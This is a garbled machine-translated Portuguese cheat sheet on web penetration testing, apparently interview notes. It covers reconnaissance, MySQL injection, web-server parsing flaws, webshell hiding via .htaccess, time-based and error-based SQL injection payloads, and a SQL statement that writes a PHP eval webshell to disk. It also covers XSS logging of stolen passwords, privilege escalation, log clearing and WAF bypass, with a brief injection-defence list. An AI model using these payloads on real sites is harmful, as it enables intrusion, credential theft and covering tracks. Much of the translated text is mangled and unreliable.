1. Recolha de Informação
whois, website IP, junto à estação, segmento C, a versão do servidor, uma versão recipiente, versão serviço, tipo de banco de dados, nomes de dois de domínio, firewall,
2.Mysql local da injeção, mais de 5,0 e 5,0 ou menos Qual é a diferença?
5.0 A tabela a seguir não é information_schema este sistema não pode lista mostra que só a violência nome cronômetro, é uma operação de um único usuário, mais de 5,0 é um multi-usuário
3 para determinar o significado da CMS
Eles podem encontrar a auditoria de código fonte correspondente, a vulnerabilidade pode ir à biblioteca para encontrar a exposição correspondente de vulnerabilidades.
diretório varredura significado
arquivos sensíveis, dois diretórios de varredura (fonte de backup local, indicando .tx, pode haver outros locais do diretório secundário
recipiente de 5 Serviços Web comum
IIS, Apache, nginx, Lighttpd, Tomcat
6. vulnerabilidade de análise
1.IIS6.0
/xx.asp/xx.jpg "xx.asp" é o nome da pasta
2 IIS7.0 / 7,5
Fast-CGI é ativado por padrão, /1.php entrada direta na imagem após a url endereço, php irá analisar como uma imagem normal
3 Nginx
Versão 0.8.37 ou menos, usando o método e o IIS 7.0 / 7.5, como o caso fechado Fast-CGI também podem ser utilizados. byte nulo xxx.jpg.php código
4Apache
Fazer o upload do arquivo é chamado: test.php.x1.x2.x3, Apache é da direita para a esquerda para determinar o sufixo
7RDP não unir solução de problemas
Sem aberto 3389 (varredura de portas)
Porto é modificado (há circunstâncias sob webshel: ltasklist / svc | findstr "TermService" encontrado TermService processo ID, em seguida, executar o mesmo correspondente "netstat -ano" encontrar o ID do processo do número de porta)
interceptação de proteção (tentar evitar matar controle remoto mencionar à direita)
Ambiente no interior da rede (o encaminhamento de porta: LCX REGEORG NC, etc.)
código Hex injeção byte largura Anuladas
O que podemos fazer 9webshell.htaccess arquivo
cavalo escondido
<FilesMatch "xxx.jpg"> aplicação SetHandler / x-httpd-php </ FilesMatch>
Desta vez será analisado em .jpg .php
Por que pode injetar 10
Ver inventário senha de administrador de dados para trás para ver se você pode tirar proveito do fundo (upload de arquivos, etc.)
Se a autoridade DBA pode gravar arquivos diretamente slqmap
acesso root para a senha de banco de dados (se for), você pode tentar Phpmyadmin get WebShell
11. Carregar Malásia ilegível
problema de codificação do navegador
12 No caso da casca, como usar XSS conseguir o controle a longo prazo da estação de destino?
js adicionar alguns registros de login senha da conta para um registro TXT em (lembre-se verdadeiro ou falso)
13 falha lógica
Esqueceu a senha
Vulnerabilidade código
brecha único Top
vulnerabilidades de autenticação
14 um site, como fazer
Coleta de Informações (CMS editor de banco de dados do sistema do servidor de subdomínio porta diretório whois) para encontrar a versão correspondente [então] lacunas
detecção de vulnerabilidade (XSS arquivo não autorizado a execução de código injeção CSRF SQL contém etc.)
Explorar (get WebShell maneira descrita acima)
direito de venda
Windwos Serv-u mencionar o UDF direito mencionar o direito barbecue II6 brasileira CVE-2018-8120, etc.
LINUX posse de gado (lembre-se de passwd backup) do kernel escalação de privilégios, etc.
Limpeza de log
relatórios de bugs e reparação
função de injeção de erro sql
extractvalue updatexml GeometryCollection () multiponto .polygon multilinha exp linestring
Injeção de atraso
se (ASCII (substr ( “Olá”, 1, 1)) = 104, o sono (5), 1)
ficheiro de gravação sql
selecione 'palavra' no arquivo de saída 'caminho'
selecionar 'palavra' em dumpfile 'caminho'
selecionar '<PHP o eval (o POST $ _ [1].) ??>' em dumpfile 'D: \ wwwroot \ Baidu.com \ nvhack. php ';
defesa de injeção SQL
1, o uso de segurança da API 2, caracteres especiais inseridos fuga escapar 3, whitelist método de validação para normalizar a entrada 4, a entrada do cliente de controle não é permitido para inserir o caractere especial associado a injeção de SQL 5, o servidor antes de enviar consultas de banco de dados SQL, filtragem de caracteres especiais, escape, substituir, excluir.
a execução de código, leia o arquivo, a função de execução de comandos
1, a execução de código: o eval, preg_replace + / E, Assert, também call_user_func, call_user_func_array, create_function 2, arquivo lê: file_get_contents (), highlight_file () , fopen (), arquivo Read (), fread (), fgetss (),
3, o comando: sistema (), exec (), shell_exec (), intermediário (), pcntl_exec (), popen (), proc_open ()
Waf desvio
Injeção de SQL
1, você pode usar a palavra-chave% (IIS série apenas).
2, por meio da matança, comentários incorporados.
3, a codificação.
4. Copie elaborar
Carregar arquivo
1. Uma embalagem de uma cópia 2. Na forma-dados; posteriormente aumentado por um certo carácter